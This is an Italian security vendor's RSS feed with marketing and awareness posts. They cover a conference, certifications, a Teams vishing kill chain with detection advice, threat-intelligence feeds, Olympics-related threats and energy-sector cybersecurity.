Certego's RSS Feed

PanoptiCON2026 - Fuoco invisibile: la difesa inizia da ciò che sai vedere

Pier Giorgio Bergonzi, Product Marketing — Tue, 31 Mar 2026 22:00:00 GMT

PanoptiCON, la cyber conference di Certego, torna anche nel 2026 con una nuova edizione, confermandosi come un appuntamento annuale dedicato a imprese, professionisti e decision maker che vogliono approfondire i temi più attuali della cybersecurity.

L’edizione 2026 si terrà il 4 giugno nella cornice di Monteleone21 – Masi in Valpolicella(VR) e porterà al centro della riflessione un tema cruciale: la capacità di riconoscere in tempo i segnali deboli di un attacco prima che si trasformino in una crisi.

Il titolo scelto per questa nuova edizione è “Fuoco Invisibile – La difesa inizia da ciò che sai vedere”. Gli attacchi informatici non arrivano mai davvero all’improvviso: iniziano come scintille nascoste, segnali silenziosi e anomalie apparentemente marginali che spesso passano inosservati, fino a trasformarsi in incendi capaci di compromettere processi, dati e continuità operativa. È proprio da questa immagine che prende forma il concept dell’evento: nella cybersecurity, vedere in anticipo ciò che brucia sotto la superficie significa poter intervenire prima che il danno diventi esteso e irreversibile.

PanoptiCON2026 nasce da questa consapevolezza e propone una riflessione sulla sicurezza informatica non solo come insieme di tecnologie, ma come cultura, responsabilità e visione strategica. Attraverso interventi di esperti, casi reali, dimostrazioni e momenti di confronto, l’evento esplorerà come rilevare, prevenire e gestire minacce che si muovono nell’ombra, offrendo alle aziende strumenti concreti — tecnici e umani — per proteggere il proprio futuro.

PanoptiCON si conferma così un momento di incontro e approfondimento pensato per condividere esperienze, visioni e competenze, in un contesto che ogni anno riunisce la community della sicurezza informatica attorno ai temi più urgenti del settore.

Segna la data in agenda: 4 giugno 2026. Nelle prossime settimane condivideremo maggiori dettagli sul programma, ospiti, sponsor e modalità di partecipazione.

Certego rafforza il proprio impegno nella sicurezza Cloud con le certificazioni ISO 27017 e ISO 27018

Pier Giorgio Bergonzi, Product Marketing — Sun, 22 Mar 2026 23:00:00 GMT

Il conseguimento delle certificazioni ISO/IEC 27017 e ISO/IEC 27018 rappresenta un ulteriore passo nel percorso di evoluzione del Sistema di Gestione Integrato di Certego, già conforme agli standard ISO 9001 e ISO/IEC 27001, recentemente confermati a seguito degli audit di sorveglianza.

In particolare, la certificazione ISO/IEC 27017 introduce controlli specifici per la sicurezza dei servizi Cloud, mentre la ISO/IEC 27018 definisce linee guida per la protezione dei dati personali (PII) trattati in ambienti Cloud pubblici.

Questi riconoscimenti attestano la conformità della piattaforma proprietaria PanOptikon® e dei processi operativi aziendali ai più elevati standard internazionali in materia di sicurezza delle informazioni, governance e protezione dei dati.

In un contesto normativo in continua evoluzione, caratterizzato da framework come la Direttiva NIS2 e il Regolamento DORA, Certego conferma il proprio ruolo di partner affidabile per la protezione delle infrastrutture digitali, garantendo elevati livelli di trasparenza, controllo e resilienza.

Dal Vishing al Domain Controller

Pier Giorgio Bergonzi, Product Marketing — Tue, 10 Mar 2026 23:00:00 GMT

Nelle ultime settimane il nostro SecOps Team ha rilevato un incremento significativo di campagne di Vishing veicolate tramite Microsoft Teams, in linea con quanto avevamo già evidenziato in questo documento.

Non si tratta di semplice phishing adattato a un nuovo canale di comunicazione. Parliamo di attacchi strutturati, costruiti combinando:

ingegneria sociale
abuso di configurazioni cloud permissive
utilizzo di strumenti legittimi per l’accesso remoto
escalation progressiva verso i sistemi core

L’obiettivo finale osservato è chiaro: ottenere il controllo delle macchine aziendali, fino al Domain Controller, con il rischio concreto di compromissione dell’intera infrastruttura.

Kill Chain dell’attacco tipico (MITRE ATT&CK mapping)

1. Initial Access – Valid Accounts & Phishing (T1078 / T1566)

L’attacco inizia con una chiamata improvvisa su Teams.

Gli attaccanti si presentano come personale IT e sfruttano una configurazione spesso lasciata invariata: Teams consente di default chiamate da utenti esterni.

Questa fase combina:

Phishing via servizio di comunicazione (T1566)
Tentativi di raccolta credenziali → Valid Accounts (T1078)

La leva dominante è l’urgenza: un presunto aggiornamento critico di sicurezza Windows che richiede un intervento immediato.

2. Execution – Remote Services & User Execution (T1021 / T1204)

Una volta ottenuta la fiducia dell’utente, l’attaccante guida l’interazione verso l’azione concreta: condivisione di credenziali, installazione di strumenti di accesso remoto o utilizzo di tool di Remote Support già presenti sull’host.

Qui osserviamo tipicamente:

User Execution (T1204)
Remote Services (T1021)
In alcuni casi Command and Scripting Interpreter (T1059)

Non viene necessariamente distribuito malware custom. L’attacco si basa su Living-off-the-Land techniques (LOLBins), sfruttando strumenti legittimi già disponibili nell’ambiente. Questo riduce drasticamente gli indicatori tradizionali di compromissione.

3. Privilege Escalation & Credential Access (T1068 / T1003)

Dopo l’accesso iniziale, l’obiettivo diventa l’espansione del controllo.

Si osservano:

raccolta di credenziali
reset password sospetti
modifiche agli account

Le tecniche associate possono includere:

Credential Dumping (T1003)
Exploitation for Privilege Escalation (T1068)
Account Manipulation (T1098)

Il fine è ottenere privilegi amministrativi sufficienti per muoversi lateralmente all’interno dell’infrastruttura.

4. Lateral Movement & Impact (T1486)

Una volta acquisiti privilegi adeguati, l’attacco entra nella fase più critica: accesso ai sistemi core, movimento verso Active Directory e tentativo di controllo del Domain Controller.

In questa fase possono essere attivate:

Remote Services (T1021)
Distribuzione di payload ransomware (T1486)
Persistenza su identità privilegiate

A questo punto l’incidente non è più limitato a un singolo endpoint: diventa infrastrutturale.

Perché questo attacco elude molte difese

Questo tipo di compromissione è particolarmente insidiosa perché:

Utilizza un canale legittimo (Teams)
Sfrutta configurazioni di default
Impiega strumenti amministrativi leciti
Non richiede exploit zero-day

È un attacco identity-driven. Ed è proprio questa caratteristica a renderlo difficile da intercettare con controlli tradizionali basati su firme o IOC statici.

MDR: cosa deve essere monitorato

Un MDR orientato alla detection engineering deve essere in grado di correlare eventi cloud, endpoint e identity in un’unica vista coerente.

1. Eventi anomali su Teams

Segnali rilevanti includono:

chiamate provenienti da tenant sconosciuti
tenant di prova o domini onmicrosoft.com
pattern di contatto verso utenti non tecnici

Questa visibilità richiede l’integrazione dei log Microsoft 365 nel SIEM e la capacità di analizzare i comportamenti nel tempo.

2. Uso anomalo di strumenti di Remote Support

Gli attaccanti sfruttano tool già presenti sugli host, riducendo l’impatto delle soluzioni anti-malware tradizionali.

Un approccio detection-first efficace prevede:
alert su esecuzione di tool di remote access fuori baseline
correlazione tra chiamata Teams e avvio di una sessione remota
monitoraggio dei privilegi temporanei concessi

Il valore non è nel singolo alert, ma nella concatenazione logica degli eventi.

3. Identity & Account Monitoring

Tra gli eventi da correlare:

reset password non pianificati
modifiche agli account
cambi di configurazione sugli host

Ancora una volta, è la sequenza temporale a fare la differenza: singoli eventi possono sembrare legittimi; la loro combinazione racconta invece una storia diversa.

Hardening: misure concrete - Revisione delle chiamate esterne su Teams

Poiché Teams consente chiamate da utenti esterni di default, è fondamentale intervenire con:

whitelist di tenant autorizzati
policy restrittive per utenti non IT

Blocco dei domini onmicrosoft.com

Gli attaccanti utilizzano frequentemente tenant di prova. Se non necessari, bloccare domini che terminano con onmicrosoft.com riduce significativamente la superficie di attacco.

Detection-first vs Prevention-only

Questo caso dimostra un punto chiave: la prevenzione, da sola, non è sufficiente.

Il controllo deve essere continuo e la correlazione cross-layer è determinante. Un servizio MDR focalizzato su:

telemetria estesa
detection engineering
risposta 24/7

può intercettare la kill chain nelle fasi iniziali, prima che il Domain Controller venga compromesso.

Il Vishing via Teams rappresenta l’evoluzione naturale delle tecniche di social engineering negli ambienti cloud collaborativi.

Non è solo la sofisticazione della tecnica di attacco a fare la differenza, ma la capacità dell’organizzazione di: rilevare comportamenti anomali correlare segnali deboli interrompere l’escalation prima che diventi sistemica

Dal Vishing al Domain Controller, la distanza può essere poca… la differenza sta nella capacità di detection.

Continuous Vulnerability Detection

Pier Giorgio Bergonzi, Product Marketing — Mon, 23 Feb 2026 23:00:00 GMT

La gestione delle vulnerabilità è oggi una leva strategica per ridurre il rischio e rafforzare la postura di sicurezza. Quando il Vulnerability Management è integrato con le attività di Detection e Response, le informazioni sull’esposizione degli asset diventano parte attiva del processo operativo di sicurezza, contribuendo in modo concreto alla gestione del rischio.

È in questa direzione che si inserisce l’integrazione nativa di Qualys VMDR in PanOptikon®, la Unified Security Operations Platform di Certego.

Una partnership consolidata, un’evoluzione naturale

La collaborazione tra Certego e Qualys è attiva da anni. Le tecnologie Qualys rappresentano da tempo un elemento fondamentale per garantire ai nostri clienti visibilità sulle vulnerabilità e sull’esposizione dei propri asset.

L’integrazione nativa in PanOptikon® rappresenta un passo evolutivo: non più uno strumento esterno collegato ai servizi, ma una componente pienamente integrata nella piattaforma e nel modello operativo MDR.

Una scelta coerente con la nostra visione di sicurezza unificata.

MDR e Vulnerability Management nello stesso ecosistema operativo

Con Qualys VMDR nativamente integrato in PanOptikon®, le vulnerabilità entrano nello stesso ambiente operativo in cui vengono erogati i servizi di Managed Detection and Response. Questo significa che:

la visibilità sulle vulnerabilità è continua e direttamente disponibile in piattaforma
l’esposizione degli asset è contestualizzata rispetto al rischio
le informazioni diventano parte del contesto operativo della Detection e della Response

MDR e Vulnerability Management non sono più ambiti distinti, ma componenti integrate di un unico ecosistema operativo, accessibile da una sola piattaforma e governato con una logica unificata, progettata per offrire una UX chiara e coerente, in cui Detection, Response e Vulnerability Management convivono nello stesso contesto.

Visibilità continua e prioritizzazione basata sul rischio

L’integrazione consente di monitorare in modo continuo il perimetro di scansione direttamente dalla piattaforma, ottenendo una visione aggiornata delle vulnerabilità e del livello di esposizione degli asset.

All’interno di PanOptikon® è possibile:

Visualizzare il numero di vulnerabilità da correggere
Analizzare le vulnerabilità per asset o per singola CVE
Definire le priorità di intervento in base al rischio

Il dato tecnico viene così trasformato in elemento decisionale, supportando una gestione strutturata e consapevole delle attività di remediation.

Dall’analisi alla remediation

L’integrazione non si limita alla visibilità. La piattaforma consente di approfondire il dettaglio delle CVE da correggere e pianificare in modo strutturato le attività di remediation, integrando la gestione delle patch nel processo complessivo di sicurezza. Il risultato è una gestione delle vulnerabilità pienamente inserita nel ciclo operativo della sicurezza, non come funzione isolata ma come parte integrante del governo del rischio.

Il valore del SecOps Certego

Accanto all’integrazione tecnologica, il valore distintivo è rappresentato dal presidio del SecOps Team Certego.

I nostri analisti, esperti e pluricertificati, vantanno una esperienza pluriennale con la solzuione Qualys VMDR. Ne conoscono a fondo le funzionalità, le logiche di prioritizzazione e le modalità di integrazione nei processi di sicurezza. Questa esperienza consente di andare oltre la semplice identificazione delle vulnerabilità.

Il SecOps Certego supporta i clienti nella lettura dei risultati, nella contestualizzazione rispetto al profilo di rischio e nella definizione delle priorità di intervento. Le vulnerabilità non vengono trattate come un elenco tecnico, ma come elementi da integrare in una strategia strutturata di remediation all’interno dei servizi MDR.

L’esperienza maturata sul campo permette inoltre di integrare più rapidamente le informazioni nel flusso operativo, accelerando l’allineamento tra esposizione degli asset, attività di Detection e Response e piani di remediation.

In questo modo, la gestione delle vulnerabilità non è solo tecnologicamente integrata nella piattaforma, ma anche operativamente guidata da competenze specialistiche, generando un valore aggiunto concreto nella riduzione del rischio.

PanOptikon® come centro di controllo unificato

Con l’integrazione nativa di Qualys VMDR, PanOptikon® rafforza ulteriormente il proprio ruolo di centro di controllo unificato per le attività di Security Operations.

Incident Response, Detection e Vulnerability Management convergono in un unico ambiente operativo, offrendo:

visione centralizzata degli asset esposti
prioritizzazione basata sul rischio
gestione coordinata delle attività di remediation

Un unico ecosistema operativo per integrare tecnologia, processi e competenze nella gestione integrata del rischio.

Indicatori di compromissione

Pier Giorgio Bergonzi, Product Marketing — Wed, 18 Feb 2026 23:00:00 GMT

C’è una domanda che ogni CISO dovrebbe farsi: le mie tecnologie stanno bloccando tutto quello che potrebbero bloccare?

Firewall, proxy, DNS filtering, EDR, SIEM: funzionano. Ma la loro efficacia dipende da una "cosa semplice" — la qualità degli indicatori che li alimentano.

Il problema dei feed “generici”

I feed pubblici spesso privilegiano la quantità:

migliaia di IP
domini segnalati senza contesto
indicatori vecchi che rimangono nelle liste troppo a lungo

Il risultato?

Aumento dei falsi positivi
Rumore operativo
Blocklist poco aggiornate
Analisti che perdono tempo a verificare segnali poco rilevantiù

La Threat Intelligence non dovrebbe aumentare il carico operativo. Dovrebbe ridurlo.

IOC proprietari: cosa cambia davvero

Un IOC diventa strategico quando non è solo “raccolto”, ma:

osservato su infrastrutture reali
validato e classificato
contestualizzato
gestito nel tempo (già, perché gli IOC possono decadere col tempo)

E soprattutto quando è rilevante per il contesto geografico e settoriale in cui opera l’azienda.

Un’intelligence focalizzata sul panorama italiano, costruita su visibilità concreta e sensori distribuiti, produce indicatori diversi rispetto ai feed globali di carattere generale. Più mirati. Più utili.

Fase 1: Prevenzione — quando l’IOC diventa un moltiplicatore

Il primo impatto è immediato. Gli IOC proprietari possono essere integrati nei sistemi esistenti:

firewall
IDS/IPS
DNS filtering
proxy
SIEM

Non serve cambiare architettura. Serve migliorare ciò che alimenta i controlli. La differenza sta in tre fattori chiave:

Tempestività

Indicatori aggiornati in tempo reale intercettano minacce attive, non campagne concluse mesi prima.

Precisione

Verifica continua e controllo qualità riducono il rumore e i falsi positivi.

Decadimento controllato

IP e domini non rimangono in blacklist per sempre. Gli indicatori vengono mantenuti solo finché sono realmente pericolosi.

Il risultato è concreto: più blocchi rilevanti, meno rumore.

Caso reale Certego #1 – Settore Finance

Un gruppo enterprise del settore finanziario, cliente MDR Certego, ha integrato i nostri IOC proprietari nel firewall perimetrale già in uso, senza modificare l’architettura esistente.

Nei primi 7 giorni di utilizzo:

+10% di incremento dei blocchi firewall grazie agli IOC di Certego
20 milioni di tentativi di connessione malevola bloccati da indirizzi IP classificati come malevoli da parte di Certego

Non si tratta di nuove policy più restrittive. Non è stato sostituito il firewall. È stato semplicemente migliorato il feed di intelligence che lo alimentava.

Quel +10% significa una cosa precisa: traffico malevolo che prima passava inosservato e che ora viene fermato prima di generare alert interni o tentativi di compromissione.

Nel settore Finance, dove l’esposizione verso campagne phishing, C2 e infrastrutture fraudolente è costante, questo si traduce in riduzione preventiva della superficie di attacco.

Caso reale Certego #2 – Settore Manufacturing

In un’azienda industriale con forte esposizione OT e vincoli di continuità produttiva, abbiamo applicato lo stesso approccio: integrazione degli IOC proprietari Certego sui controlli perimetrali già presenti.

Risultato nella prima settimana:

+21% di incremento dei blocchi firewall grazie agli IOC di Certeg
+12 milioni di tentativi di connessione malevola bloccati da indirizzi IP classificati come malevoli da parte di Certego

Nel manufacturing, ogni connessione malevola in meno non è solo un numero.

Significa:

meno traffico sospetto che entra in rete
meno eventi che arrivano al SOC
meno probabilità che un’infrastruttura di produzione venga coinvolta

Qui la Threat Intelligence non è solo un report da leggere. È riduzione misurabile del rischio operativo.

Fase 2: Analisi — quando l’IOC accelera l’incident response

Gli indicatori non servono solo a bloccare. Servono a capire.

In fase di analisi, un IOC efficace deve rispondere subito a tre domande:

Che tipo di minaccia è?
È collegata a una campagna nota?
Quanto è attiva e diffusa?

Un indicatore contestualizzato — arricchito con informazioni su:

famiglia malware
tecniche utilizzate
fase della kill chain
prima e ultima osservazione

permette agli analisti di ridurre drasticamente il tempo di triage.

Non è più esclusivamente un match su una lista. È un oggetto con significato operativo.

Performance del SOC

Spesso si misura l’MDR in termini di:

MTTD - Mean Time To Detect
MTTR - Mean Time To Respond
numero di incidenti gestiti

Meno frequentemente si misura l’effetto della qualità dell’intelligence su:

volume di alert evitati
tempo medio di analisi
riduzione del rumore perimetrale
carico sugli analisti

IOC proprietari ben gestiti migliorano entrambe le fasi:

Prevenzione: più blocchi mirati, meno traffico malevolo interno

Analisi: triage più rapido, decisioni più informate

SOC: meno rumore, più focus sugli eventi critici

Vantaggio competitivo

Un data feed non è una lista. È un processo continuo:

raccolta
validazione
correlazione
aggiornamento
integrazione operativa

Quando questo processo è progettato per essere vicino al contesto reale delle aziende che protegge, l’effetto non è teorico. Si traduce in:

percentuali di blocco misurabili
milioni di connessioni malevole intercettate
tempi di risposta ridotti
migliore utilizzo delle risorse interne

E in un’epoca in cui le superfici di attacco crescono più velocemente dei team di sicurezza, migliorare le performance delle difese esistenti è una leva fondamentale per aumentare il livello di protezione complessivo.

Giochi Olimpici Invernali

Pier Giorgio Bergonzi, Product Marketing — Thu, 29 Jan 2026 23:00:00 GMT

Milano–Cortina 2026 non è “solo” un evento sportivo. È una macchina temporanea che si accende, gira a regime altissimo per poche settimane e poi si spegne. In mezzo, però, succedono tante cose: persone che arrivano, badge che si attivano, account che si creano, fornitori che entrano, pagamenti che scorrono, servizi che devono funzionare sempre.

E quando il mondo guarda, non guardano soltanto gli appassionati.

Non è un messaggio allarmistico, né una profezia nera: è un ragionamento probabilistico.

In altre parole: se i Giochi sono una vetrina globale, è normale che qualcuno provi a salirci sopra—anche solo per pochi minuti—per far rumore.

Perché i grandi eventi “moltiplicano” il rischio

Ci sono tre ingredienti che, insieme, rendono qualsiasi mega-evento un magnete:

1) Il rumore di fondo è altissimo

In periodi normali, un’email strana o una richiesta “fuori procedura” risalta. Durante un evento globale, invece, arrivano davvero mille eccezioni: nuovi contatti, nuove urgenze, nuovi flussi, nuovi strumenti. Lo scenario perfetto per chi punta sulla confusione.

2) L’ecosistema è enorme (e non uniforme)

Non esiste “un unico perimetro”: ci sono organizzatori, venue, sponsor, media, hospitality, logistica, trasporti, service desk, IT di terze parti, consulenti, stagionali, volontari… la sicurezza non è mai identica per tutti. E gli attaccanti, storicamente, preferiscono gli anelli più deboli.

3) L’impatto reputazionale amplifica tutto

Anche un incidente relativamente “contenuto” può diventare enorme se si traduce in disservizi pubblici, code ai tornelli, biglietti bloccati, comunicazioni confuse, pagamenti non disponibili. Nei grandi eventi spesso la pressione non è tecnica: è mediatica.

La “pista lunga” degli attacchi: non succede tutto durante i Giochi

Uno dei fraintendimenti più comuni è immaginare l’attacco “il giorno della cerimonia”. In realtà, la finestra interessante è più ampia:

Prima: vendita biglietti, prenotazioni, accrediti, assunzioni temporanee, onboarding fornitori, nuovi siti e landing page “a tema”, campagne social;
Durante: picchi di traffico, assistenza al pubblico, continuità operativa, turnover, escalation rapide, più pressione sugli operatori;
Dopo: rimborsi, contestazioni, fatture, report, dismissione di ambienti temporanei (che spesso resta incompleta).

È qui che si annidano i problemi più banali e più frequenti: account dimenticati, DNS lasciati appesi, portali temporanei rimasti online, credenziali riutilizzate, procedure bypassate “solo per oggi”.

Chi potrebbe provarci. Tre profili, un’unica regola: opportunismo

Semplificando, intorno ai grandi eventi tendono a muoversi tre “famiglie” di minacce. Le tecniche si sovrappongono, le motivazioni no.

Criminalità orientata al profitto

È la parte più “pratica” e spesso la più rumorosa: vuole monetizzare.

truffe sui biglietti e sull’hospitality
phishing e furto credenziali (anche per rivendere accessi)
frodi su pagamenti e fatture
estorsioni e ransomware (spesso con minaccia di pubblicazione dati)

Qui la parola chiave è scalabilità: basta che “ci caschi” una piccola percentuale, e l’operazione funziona.

Attori orientati all’intelligence

Più pazienti, più selettivi: cercano accesso, informazioni, posizionamento. I grandi eventi sono interessanti perché concentrano persone di rilievo, comunicazioni sensibili e infrastrutture condivise in un contesto ad alta densità.

Non serve immaginare scenari hollywoodiani: spesso l’obiettivo è più semplice (e più realistico): acquisire visibilità su email, documenti, chat, reti o dispositivi di figure chiave e dei loro staff.

Gruppi dimostrativi e sabotaggio

Qui il valore è l’eco: far parlare di sé, sostenere una causa, creare pressione. Gli strumenti sono spesso “semplici” (defacement, DDoS, takeover di canali social, leak mirati), ma l’effetto mediatico può essere grande.

Le tecniche che funzionano perché… funzionano sugli esseri umani

Se c’è una lezione costante nella sicurezza, è questa: durante i picchi operativi, la componente umana diventa il vero punto di contatto.

Impersonificazione e BEC: la frode che si traveste da lavoro

Non è “l’email con l’italiano sgangherato”. Oggi l’attacco credibile è quello che assomiglia al lavoro vero:

“Serve approvare questa variazione IBAN entro oggi”
“Il fornitore ha cambiato dominio, usa questa nuova mail”
“Sono in riunione, fai tu e poi mi aggiorni”
“Blocco urgente: conferma l’accesso o perdi la prenotazione”

La differenza la fanno due cose: contesto e urgenza.

QR code, app finte e siti clone: la truffa “da turista”

Non è “l’email con l’italiano sgangherato”. Oggi l’attacco credibile è quello che assomiglia al lavoro vero:

Quando arrivano persone da tutto il mondo, aumentano anche le truffe a bersaglio largo:

QR code “pratici” che portano a pagine malevole
app non ufficiali
annunci sponsorizzati che imitano portali di ticketing o prenotazione
finti supporti clienti via chat/social

È la versione digitale del bagarino: cambia il mezzo, non la logica.

Deepfake vocali e “high touch”: quando l’attacco passa dal telefono

Sempre più spesso l’attaccante non si limita a scrivere: chiama. Prende di mira help desk e service desk perché sono la scorciatoia perfetta: reset password, bypass MFA, nuove registrazioni di device, “eccezioni” autorizzate al volo.

E con audio sintetico e voce “simile”, la pressione psicologica aumenta: sembra tutto più reale, più urgente, più inevitabile.

“Fai da solo e risolvi”: l’ingegneria sociale mascherata da assistenza

Sempre più spesso l’attaccante non si limita a scrivere: chiama. Un’altra dinamica moderna: convincere l’utente a “risolvere” un problema eseguendo azioni che in realtà aprono la porta (installare, abilitare macro, lanciare comandi, concedere permessi, autenticarsi su pagine fasulle). Non è tecnologia avanzata: è manualistica invertita.

Le aree dove un disservizio fa più male

In un evento globale, il tema non è solo “furto dati”. Spesso è la continuità: Alcuni esempi (senza fare terrorismo, solo pragmatismo):

accessi e ticketing: code, validazioni bloccate, customer care in tilt
pagamenti: POS, ricariche, servizi cashless, frodi e chargeback
hospitality e trasporti: prenotazioni, check-in, cambi orari, logistica
comunicazione e canali ufficiali: social, siti, app, messaggistica al pubblico
fornitori e operations: turni, badge, sistemi interni, strumenti di assistenza

Sono tutte aree dove anche un problema “piccolo” diventa enorme perché impatta direttamente l’esperienza.

Prepararsi bene, senza vivere male: cosa fare davvero, in ordine di resa

Qui il punto non è comprare “un prodotto in più”. È fare bene le basi, con un criterio: stare pronti batte diventare pronti.

1) Inventario e dipendenze: sapere chi tocca cosa

quali sistemi sono “core”
quali sono temporanei
quali sono gestiti da terze parti
quali integrazioni/API esistono davvero (non solo su carta)

Se non si vede, non si difende. E soprattutto: non si ripristina in fretta.

2) Accesso: ridurre privilegi, alzare attrito, eliminare eccezioni

MFA ovunque (davvero ovunque, soprattutto su email e VPN)
principi di minimo privilegio
controllo di accesso “just in time” dove possibile
revisione periodica degli account (in particolare contractor e stagionali)

Durante un evento, l’attaccante spesso non “buca”: entra da una porta rimasta socchiusa.

3) Supply chain: contratti e controlli operativi

Non basta chiedere “siete ISO?”. Serve chiarezza su:

chi può accedere e come
logging e tracciabilità
tempi di notifica incidenti
escalation e contatti 24/7
test e audit minimi sugli ambienti esposti

Gli attaccanti amano i passaggi laterali: non serve colpire il bersaglio più protetto se c’è un partner più accessibile.

4) Monitoraggio e risposta: ridurre tempi, non solo prevenire

playbook pronti (phishing/BEC, account takeover, DDoS, leak)
esercitazioni tabletop “realistiche” (con pressione, telefonate, social, media)
canali di comunicazione interni alternativi (quando la mail è “sospetta”)
metriche pratiche: quanto tempo per rilevare? quanto per contenere?

Nel mondo reale, la differenza la fa la velocità: capire presto e limitare danni.

5) Dismissione: chiudere bene ciò che si apre per l’evento

La parte più trascurata. E una delle più pericolose.

spegnere ambienti temporanei
revocare accessi
eliminare DNS “appesi”
archiviare in modo sicuro dati e log
verificare che non restino portali o pannelli admin esposti

Il “dopo” è spesso quando ci si rilassa. E chi attacca lo sa.

L’obiettivo non è avere paura, è avere margine

Milano–Cortina 2026 sarà un acceleratore: di turismo, di business, di infrastrutture, di attenzione globale. Ed è ragionevole aspettarsi che anche l’attività dei threat actor aumenti, perché aumentano incentivi e opportunità.

La buona notizia è che non serve vivere l’evento in modalità “allarme rosso”.

Serve viverlo in modalità preparazione: basi solide, processi chiari, supply chain governata, risposta allenata. Perché, quando tutti corrono, vince chi ha già fatto il riscaldamento.

L’oro vero è il tempo: perché MDR e Threat Intelligence contano

Negli eventi ad alta esposizione non vince chi evita ogni rischio, ma chi lo intercetta prima e reagisce meglio.

MDR serve a questo: trasformare segnali sparsi in azioni rapide — riducendo rumore, accelerando triage e contenimento.

Threat Intelligence aggiunge il contesto: quali minacce sono attive oggi, quali tecniche stanno cambiando, cosa vale davvero la pena monitorare.

Insieme fanno la differenza: più velocità, più precisione, più margine operativo.

Cybersecurity ed energia

Sun, 25 Jan 2026 23:00:00 GMT

Il punto di vista di Certego

Il settore energetico è tra i più strategici e vulnerabili nel panorama cyber globale. La natura critica delle infrastrutture, l’elevata interconnessione dei sistemi e un contesto geopolitico sempre più instabile rendono energia e cybersecurity due dimensioni ormai inseparabili. Il confronto con grandi operatori industriali – come emerge anche dall’intervista a Francesco Ceraso, Head of Security Cyber Intelligence – restituisce un quadro lucido e privo di semplificazioni: un settore in cui la convergenza tra IT e OT, la pressione geopolitica e la crescente integrazione delle filiere fanno sì che ogni attacco informatico possa rapidamente trasformarsi in un evento sistemico, con impatti che vanno ben oltre il perimetro dell’organizzazione colpita.

I dati confermano questa tendenza. Dal report State of Cybersecurity di Certego, basato sull’analisi di oltre 1.200.000 asset IT monitorati, emerge che nel primo semestre del 2025 in Italia gli attacchi verso il settore energetico sono aumentati del 4,3%. Un dato che non racconta solo una crescita quantitativa, ma segnala un’evoluzione qualitativa delle minacce, sempre più orientate a campagne strutturate, persistenti e ad alto impatto operativo.

Dalla protezione degli asset alla resilienza del sistema

Un attacco cyber alle infrastrutture energetiche non resta mai confinato: blackout, interruzioni di fornitura e impatti su trasporti, telecomunicazioni e servizi essenziali sono scenari concreti. La cybersecurity, quindi, non può essere letta come una funzione tecnica isolata, ma è un elemento strutturale della sicurezza nazionale e della stabilità economica. “Nel settore energetico la posta in gioco è la continuità operativa del Paese. Parlare di cybersecurity significa parlare di resilienza sistemica, non solo di protezione dei singoli asset”, sottolinea Bernardino Gregorio Grignaffini, CEO & Founder di Certego.

Threat Intelligence: anticipare, non solo reagire

Un elemento centrale nella visione di Certego è il ruolo della Threat Intelligence. La capacità di individuare segnali deboli, campagne in fase di preparazione e pattern comportamentali avanzati è oggi ciò che consente di passare da una difesa reattiva a una postura realmente proattiva. Come ricorda Grignaffini: “La vera differenza oggi la fa la capacità di anticipare le mosse dell’avversario. La Threat Intelligence non è un feed di indicatori, ma un processo continuo di analisi, contestualizzazione e previsione, soprattutto in ambienti complessi come quelli IT/OT”. Inoltre, è importante evidenziare come, nel settore energetico, la persistenza silente degli attaccanti rappresenta una delle minacce più insidiose. Chi attacca può restare all’interno delle reti per mesi, mappando sistemi e processi, in attesa del momento più opportuno per massimizzare l’impatto.

Condivisione delle informazioni e difesa collettiva

Un altro elemento chiave per la sicurezza del settore energetico è il valore dell’information sharing. Nessuna organizzazione può avere una visibilità completa sul panorama delle minacce: la sicurezza del singolo dipende sempre più da quella dell’intero ecosistema. “La difesa collettiva è l’unico modello sostenibile. Condividere informazioni sulle minacce in modo tempestivo e strutturato significa aumentare il livello di sicurezza di tutti”, continua Grignaffini. In quest’ottica che Certego partecipa attivamente a circuiti internazionali di scambio informativo come FIRST (Forum of Incident Response and Security Teams), contribuendo a una visione globale delle minacce emergenti, particolarmente rilevante in un contesto esposto a dinamiche geopolitiche complesse.

Supply chain e convergenza IT/OT: le nuove superfici di attacco

L’attenzione crescente verso la supply chain e la convergenza tra IT e OT rappresenta uno dei nodi critici per il futuro del settore energetico. Ogni fornitore, partner tecnologico o sistema interconnesso diventa un potenziale vettore di attacco. “La sicurezza della supply chain non è più un tema di compliance, ma di sopravvivenza operativa. Serve visibilità, monitoraggio continuo e capacità di risposta coordinata lungo tutta la filiera”, evidenzia Grignaffini. In questo scenario, servizi MDR evoluti, supportati da intelligence contestualizzata e capacità di detection avanzata, diventano un abilitatore essenziale per governare la complessità e ridurre il rischio.

Oltre la tecnologia: governance e normativa

Il rafforzamento della sicurezza delle infrastrutture energetiche passa anche da un quadro normativo europeo sempre più strutturato. La Direttiva NIS2 amplia in modo significativo gli obblighi per operatori essenziali e importanti, includendo esplicitamente energia e utilities, e introduce requisiti più stringenti su gestione del rischio, governance, supply chain security e incident reporting. A livello europeo, iniziative coordinate da ENISA, esercitazioni congiunte e programmi di cooperazione transfrontaliera mirano a rafforzare una postura comune di difesa, riconoscendo che un attacco a un’infrastruttura critica in uno Stato membro può avere impatti sistemici sull’intera Unione.

Quando il cyber diventa fisico

La storia recente dimostra come queste minacce non siano solo teoriche. Nel contesto delle guerre che oggi vengono definite ibride, in cui la dimensione cyber svolge un ruolo centrale accanto a quella militare, economica e informativa, il comparto energetico rappresenta uno degli obiettivi più strategici. Gli attacchi informatici contro infrastrutture elettriche, come quelli subiti dalla rete ucraina, dimostrano come operazioni cyber mirate possano provocare blackout, interrompere servizi essenziali e avere un impatto diretto sulla popolazione. Il conflitto russo-ucraino ha reso evidente che colpire l’energia significa colpire la resilienza di un Paese. Ma la realtà è che la tecnologia, da sola, non basta. Formazione, consapevolezza e integrazione della cybersecurity nei processi di governance sono fattori determinanti per costruire una reale resilienza. “La cybersecurity nel settore energetico, così come in tutti i settori essenziali, è una responsabilità condivisa. Tecnologia, persone e processi devono evolvere insieme, con una visione chiara del rischio e del contesto in cui si opera”, conclude Grignaffini.

Cybersecurity ed energia: la nuova frontiera della sicurezza nazionale

Intervista a Francesco Ceraso, Head of Security Cyber Intelligence di Eni S.p.A.

La sicurezza delle infrastrutture energetiche è oggi una delle sfide più critiche nel panorama geopolitico e industriale globale. Attacchi cyber sempre più sofisticati, convergenza tra IT e OT e nuove superfici di rischio impongono un cambio di paradigma nella difesa del settore Energy & Utilities. In questa intervista, Francesco Ceraso, Head of Security Cyber Intelligence di Eni S.p.A., analizza l’evoluzione delle minacce informatiche, il ruolo strategico della cyber intelligence e dell’intelligenza artificiale, e l’importanza della collaborazione tra aziende, istituzioni e partner internazionali per garantire la resilienza di infrastrutture considerate oggi un pilastro della sicurezza nazionale.

